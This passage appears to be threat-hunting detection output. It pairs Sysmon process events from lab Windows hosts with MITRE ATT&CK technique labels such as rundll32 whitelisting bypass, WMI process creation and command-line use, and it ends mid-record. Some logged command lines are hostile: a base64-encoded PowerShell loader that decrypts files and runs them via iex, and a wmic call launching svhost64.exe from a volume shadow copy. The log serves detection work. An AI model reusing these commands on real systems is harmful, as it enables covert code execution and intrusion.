<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.233522Z"">
</TimeCreated>
<EventRecordID>5952</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.183</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001026B9FF00</Data>
<Data Name=""ProcessId"">1036</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
</TimeCreated>
<EventRecordID>6188</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ProcessId"">2356</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:43.391862Z"">
</TimeCreated>
<EventRecordID>16496</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:31.380</Data>
<Data Name=""ProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ProcessId"">3788</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
<Data Name=""ParentProcessId"">3192</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
</TimeCreated>
<EventRecordID>6188</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ProcessId"">2356</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-26T07:39:14.375565Z"">
</TimeCreated>
<EventRecordID>4348</EventRecordID>
<Correlation>
</Correlation>
